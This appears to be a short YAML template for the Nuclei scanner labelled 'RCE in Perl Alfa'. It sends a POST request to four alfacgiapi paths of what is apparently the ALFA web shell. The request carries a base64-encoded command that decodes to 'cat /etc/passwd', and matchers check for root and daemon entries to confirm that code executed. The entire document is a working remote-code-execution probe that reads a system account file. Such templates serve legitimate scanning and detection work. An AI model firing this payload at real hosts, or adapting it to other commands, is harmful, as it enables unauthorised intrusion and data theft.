id: alfacgiapi-rce

info:
  name: RCE in Perl Alfa
  author: Dymles Ganz
  severity: critical
  description: |
    This template exploits a Remote Code Execution (RCE) vulnerability in Perl Alfa.
  tags: rce, perl

requests:
  - method: POST
    path:
      - "{{BaseURL}}/alfacgiapi/bash.alfa"
      - "{{BaseURL}}/alfacgiapi/perl.alfa"
      - "{{BaseURL}}/ALFA_DATA/alfacgiapi/bash.alfa"
      - "{{BaseURL}}/ALFA_DATA/alfacgiapi/perl.alfa"

    body: "cmd=Y2F0IC9ldGMvcGFzc3dk"

    matchers:
      - type: word
        words:
          - "0:0:root"
          - "daemon"
        part: body
